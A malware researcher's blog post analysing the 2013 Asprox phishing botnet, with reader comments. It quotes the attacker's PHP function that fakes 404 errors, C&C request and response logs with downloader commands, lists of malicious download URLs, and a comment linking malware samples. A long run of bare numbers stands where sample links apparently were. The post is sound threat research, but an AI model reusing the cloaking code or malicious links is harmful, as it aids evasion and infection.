Asprox Botnet 2013 - Phishing Malware As a Service

This blog-post is to compile findings on Asprox botnet. The status described here represents mainly the status of the botnet in cca May-Jun 2013. For the description of current state it would be probably better to read some more recent posts on the history list of articles related to the Asprox botnet

Asprox malware is being spread around with phishing emails claiming to be from DHL/Fedex/USPS/American Airlines/Costco/Walmart/Pizza Hut/Home Depot/Target and many others as well. It also likes to claim it is court order, funeral/wedding announcement or missed voicemail from WhatsApp.
I call this botnet Asprox based on the whitepaper from Trendmicro. Its architecture looks like enterprise cloud-based service for building the botnet of infected hosts. Infrastructure has got 2 visible load-balanced layers and at least 2 hidden inner layers.
It goes like this:

  1. Email distribution

    Phishing emails in this campaign seems to be send mostly from some hacked web-servers.
  2. Phishing email

    January 2014 phishing is for energy bills.
    December 2013 was a killing spree of many different phishing campaigns for Costco, BestBuy, Walmart, My CV, Adobe.
    September/October 2013 templates pretend to be wedding invitations or voicemail from WhatsApp.

    May-July 2013 Phishing emails direct the victims to follow to so URL to "Get Shipment Info" / or to enter shipment number on "Tracking page"URL (DHL), to "Print Receipt" to receive your parcel (FedEx), "Download It" to use the flight ticket (American Airlines) or to display "Shipment Label" (UPS).

  3. Downloader sites

    Phishing email points to compromised websites to serve ZIP file with malicious executable = Asprox downloader. On the beginning of May 2013 these sites tend to be mainly compromised Joomla 1.5 servers. At the end of May we see it is quite a lot of websites hosted in US, not necesarily Joomla related. Asprox botnet or people behind it us probably several exploits to compromise various PHP websites.
    Links from phishing emails lead to compromised websites to malicious PHP script. This PHP script proxies all the requests to another backend server (in 2013 there was 1 IP in Russia ( and whole bulk of IP addresses in germany (, but there is definitely more such servers. In case of failure/suspicion/ request thresh-hold the PHP script reports fake "404 Not Found" error code.
  4. Download zipfile

    Victim downloads the zip file from the site containing executable file for example "Delivery Information.exe" Executable file has got icon of wordfile to convince the victim to open/run it.

  5. The malware generated in the WhatsApp phishing campaign do have got icon of a note a fool the victims that this is some sound file.
  6. Execute the downloader

    When victim executes the malware, it mimics like some benign things. Notepad is opened to show some bogus tracking information.

    Malware mascarades as windows binary (svchost.exe) to run hidden and undetected on the background.

    Exe file is removed and replaced with a TXT file.
  7. Comand&Control center(s) - dozens of nginx proxies

    Malware contacts in round robin list of C&C for commands and downloading other malware. List of IPs is hardcoded to the downloader binary.Updated list of C&C can be obtained from the C&C. Sites contacted are another farm of compromised webservers running the nginx server configured as a reverse proxy. All requests are proxied to a backend server of C&C.
  8. Download other germs

    Other malware is then downloaded, executed and so on and so forth.
  9. Another layers???

    ... there is possibly more layers.

Interesting bits

These bits make it interesting:
  • Scale

    - Group seems to be running this very same infrastructure for at least 1 year. New evasion features are being added through the time - like encrypting the requests. Campaign in May 2013 was within 2 weeks using dozens of compromised Joomla servers to serve the downloader malware. It is using dozens of servers (mostly compromised webservers) to send a spam. And as of writing the backend C&C is active at least on 34 IP adresses at once. If you consider that they probably have got more to move on and use, once the current ones are closed, the scale is really like a small enterprise.
  • Evasion

    - malicious scripts on compromised download sites stop serving malware after some time and respond with fake HTTP 404 Not Found response, probably to encourage less savvy admins to stay on the current vulnerable version, as it seems that the problem gone away by itself. Similar evasion techniques are implemented on the C&C sites.
  • Automation

    - new obfuscated malware binaries for downloader are generated at least twice a day. The binaries for FakeAV downloaded from the C&C are automatically generated each 6 minutes. This ensures that samples at the time of execution are not known to your antivirus. For AV companies it usually takes 1-3 days to make a signature and propagate it for download for the client and then another days since the victim bothers to update the antivirus signatures. 
  • Cloud

    - availavility of cheap cloud services allows the "throw-away" C&C to be hosted anywhere - especially when the host is compromised server paid by somebody else :). It is surprising that the 1st and 2nd layer of C&Cs is not hosted on some bullet-proof hosting in China or Ukraine, but it is in countries like France, United Kingdom, USA, Netherlands or Germany.

Chewy details

Email Distribution

Phishing Emails

Sample DHL:

If the links are not working, please move message to  "Inbox" folder.


   26.04.2013                                                                     PACK STATION     

DHL Ship Shipment Notification

On April 25, 2013 a shipment label was printed for delivery.

The shipment number of this package is 36085695.

To get additional info about this shipment use any of these options:

1) Click the following URL in your browser:

                  Get Shipment Info

2) Enter the shipment number on tracking page:

                  Tracking Page

For further assistance, please call DHL Customer Service.

For International Customer Service, please use official DHL site.


This message was created by DHL Ship, a product of DHL, at the request

of the sender. No authentication of email address has been performed.

  Deutsche Post DHL                    2013 DHL International GmbH. All rights reserved.   

Sample DHL Express:


2013-08-01 at 11:59
Shipment not delivered
Dear Customer, your package has arrived on August 1st, but messenger was unable to deliver the package to you, for more detailed information, please, download and read mailing label.
2013 DHL International GmbH. All rights reserved.

Downloader sites

Majority the sites serving malicious downloader file in May campaign seems to be servers with Joomla 1.5.
Backed script serving the downloader is performing some limitations on the download of the malware:
  • limit 4 downloads per IP - number seems to be shared across the botnet infrastructure, this limitation probably makes it low profile from services like Google Badware
  • allow only certain User-Agents
  • probably some other filtering (geoip?, language?)
Once the limit is reached the malware scipt is generating fake HTTP "404 Not Found" message. This way it probably avoids some malware analysis and it is maybe also convincing to website managers to avoid checking and removing the malware - it seems for the first sight that the problem disappeared itself while the malicious script is still there and kicking. Versions of the script from August 2013 - January 2014 get the 404 message from the very same server to look very real. 404 message is taken from url http://this_server/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA. In the original response all occurences of called URI (AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA) are replaced with the current URI requested by the Asprox PHP proxy script to make the cloaking complete. function error_404(){ header("HTTP/1.1 404 Not Found"); $uri=preg_replace("/(\?).*\$/","",$_SERVER["REQUEST_URI"]); $content=http_request("http://".$_SERVER["SERVER_NAME"]."/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA"); $content=str_replace("/AFQjCNHnh8RttFI3VMrBddYw6rngKz7KEA",$uri,$content); exit($content); } Older versions (till August 2013) were using static page which was possible to use for fingerprinting the proxy script. $ curl http://www.into-focus.de/templates/system/onlines.php?get_info=4_36160170 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head><title>404 Not Found</title></head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> <hr> </body></html> Looks like 404 Not Found

Not Found

The requested URL was not found on this server.

The download sites are being reused at the same time for different phishing campaigns and they serve different malware binaries based on the type of the request.

RequestCampaignsampleName of Exe
?ticket=American Airlineshttp://andiburns.de/img/get.php?ticket=ss00_323Electronic Ticket.exe
?i_info=FedExhttp://andiburns.de/img/get.php?i_info=ss00_323Shipment Label.exe
?receipt=FedExhttp://andiburns.de/img/get.php?receipt=ss00_323Postal Receipt No00843412843.exe
?receipt_print=FedExhttp://andiburns.de/img/get.php?receipt=ss00_323Postal Receipt No00843412843.exe
?print=FedExhttp://andiburns.de/img/get.php?receipt=ss00_323Postal Receipt No00843412843.exe

List of active download sites - last updated 2013-06-05 and largely outdated - keeping it here just as sample.
activehttp://s350098153.onlinehome.us/img/get.php?info=882_734823154 US
activehttp://tradeline.in.ua/img/get.php?info=833_1616925145 RU
activehttp://www.calanss.com/img/get.php?info=870_538703202 US
activehttp://stevenseagal.com/img/get.php?info=885_3137019897.74.215.39 US
infectedhttp://aptekapanacea.ru/images/index.php?get_info=ss00_32389.232.139.17 RU
infectedhttp://bdvi-lsa.de/templates/rssgets.php?get_info=ss00_32385.214.40.177 DE

Sample of the PHP script can be found on this forum. It forwards the requests to some backend server with the information about the IP of the client connecting (take from proxy tags if possible).

Asprox Downloader

The downloader encrypts the requests with RC4 (see more info on the analysis from Trendmicro). Encrypted request is passed to the second layer of C&C. IP addresses of the C&Cs is hardcoded to the downloader binary. This request contains MD5 hash as identification of the victim computer and contains some action.

Request gate for work

Id is MD5 hash identifying the victim machine. Gate responds with command to the downloader. So far I have seen 3 commands sent to downloader - rdl, run, idl. Accoriding the analysis from TrendMicro there is more commands. Gate is quite picky about the format of the request - probably to make it low-profile against the automated probes from the Anti-Malware sites. If you perform the request using ordinary browser or commands like wget, you will most likely obtain only HTTP 404 Not Found
  1. rdl

    - run dll. According to TrendMicro the DLL is encrypted with RC4. After downloaded it is injected to the svchost.exe running the downloader and is executed. GET HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:17 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2 GET HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 18:37:19 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/pg.dll.crp_bak&a=0&k=52f608b4&crc=214e3b765d01df7a5b28480fa885b84e
  2. run

    - run executable - since 27-Apr-2013 till 22-05-2013 I hae seen only e3943d7369aa6add911aca18b3a507f4.exe, which is some rogue antivirus. Checking report on virustotal/threadexpert there are links also to other exe files. Since 23-May-2013 the C&Cs are serving a5347c1b5b4aa9bd13d76736eb57c67f.exe, 6b761f91b02f89f9e695d4b5a87806de.exe and b2f7e9141eb124ce3152352c5df520f7.exe. So far I do not know, what the hash filename stands for. GET HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:20 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=rdl&u=/get/sb222.dll.crp_fdsfsdf&a=1&k=fa785e1d&n=sb222&crc=8822c5d84333d6b5658dcb460d4d27a2
  3. idl

    - sleep 1 second GET HTTP/1.0 User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: HTTP/1.1 200 OK Server: nginx/1.2.6 Date: Fri, 24 May 2013 18:37:22 GMT Content-Type: text/html Content-Length: 86 Connection: close X-Powered-By: PHP/5.4.4-7 Vary: Accept-Encoding c=idl

Request Gate for the list of IPS

Id in this case is not whole MACHINEID (MD5 identification of victim), but just first 8 chars from that. For example:
GET User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US) Host: Response is RC4 encrypted list of IPs of 3rd layer C&C to contact.

Comand&Control center(s)

Current list of active C&C sites is available from Asprox tracker

Download other germs

Files are downloaded as exe (plain exe file to be executed) or as dll. The DLL have got extension crp and seem to have very high entropy, which means it is either compressed or encrypted. More analysis of the downloader is needer to determine what is happening with the dll files after downloading.

So far I have identified these files that can be downloaded as DLL modules: Corpus of Asprox Modules

In 2013 the Asprox was involved in distribution of FakeAV - new malware file (for example /get/e3943d7369aa6add911aca18b3a507f4.exe) was generated once in 6 minutes. It takes to some scheduled job another 6 minutes delay to deliver it to C&C servers. Here are samples just for one day - just to give you idea how much will your antivirus protect you against this threat. At the time of generation it is usually found as malicious only by cca 2-3 out of 46 antivirus vendors at virustotal = most probably it won't be detected by your anrivirus at the time of first execution: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457
This exe file - FakeAV - is some rogue Antivirus. Once it is executed it reports itself to some registration site in Hongkong:


  1. Sample of PHP on compromised Joomla 1.5 server.

  2. Another sample of malicious PHP scripts on compromised Joomla server.

  3. What do I do if I have become a victim of this?

  4. Hi Rebus,

    Nice post. I run into same threat in this week. So it might be helpful to share it here.

    We got new ones, yesterday, spreads FakeAV CnC is a week old, up & alive.
    sample of this Kuluoz (asproxy) and fake av downloaded by it: http://www.mediafire.com/?efldm0wwpdfajry

    And before above case (different CnC, also up and alive)
    and also these:

    Keep on the good work
    #MalwareMustDie! www.malwaremustdie.org
    @unixfreaxjp (twitter)

  5. Search for the latest binaries of Asprox downloader trojan on:
    https://malwr.com/analysis/search/ - searching for tag:asprox

    https://www.virustotal.com/en/search/ - search for #asprox or #kuluoz

    Michal Ambroz

  6. I have received a number of these emails, and although I have not opened them-they were unidentified and too suspicious-it is the first time I am researching it more comprehensively.

    I just want to thank you and all the anti malware crowd (especially if voluntary!) for your work and information provided to the world at large!

  7. Hey there,

    one of my clients is getting re-infected almost daily. We're using Typo3 4.6.18 (will upgrade now to 4.7) with up-to-date plugins. I've seen that you requested the URLs to the CC in a different forum, here are mine:, The virus also created multiple files: main.php, mirror.php, voice.php, message/.htaccess, message/info.php

  8. Hi. My webhost informed me that a website I manage for one of my clients has had two folders created on it - one called "news" and one called "messages". Within each of these folders were 2 files. the files were .htaccess with the following code

    RewriteEngine On # Turn on the rewriting engine

    RewriteRule .*/.* info.php?$0

    and another file called info.php with about 200 lines of php code, which includes a link to the following address

    I don't know how someone got access to the webspace to upload these files. (my hosting company is Strato)

    I have deleted the folders and files, but am concerned as to how they got there in the first place and whoever put them there will do it again.

    Can anyone hep me please?


    1. Hey Joel,

      after a few days upgrading my clients homepage the files still were being created daily. Two days later some other site which hasn't been in use since 2003 also got hacked. Seems like the FTP passwords were hacked by an keylogger or something like that. Just changed all my passwords and since then nothing happened again.


  9. New Malvertising campaigns dressed as Walmart an BestBuy and My CV and Adobe License and Some Court related stuff and CostCo

    Strings found in obfuscated binary:

    Asprox has changed the encryption scheme again. Requests from the downloader to C&C backends look like this:

    POST HTTP/1.0
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:25.0) Gecko/20100101 Firefox/25.0
    Content-Length: 316
    Pragma: no-cache

    <80>^@^@^@ESCn0ā^R^G/...binary garbage

  10. Name of Brian Krebs missused by the most recent sample of Asprox downloader.

  11. BadwareBusters just ignoring the issue of not listing the download sites:

  12. Asprox downloader on a hacked server - http://forums.modx.com/thread/91776/hacked-site-lang-php-and-assets-images-logo-php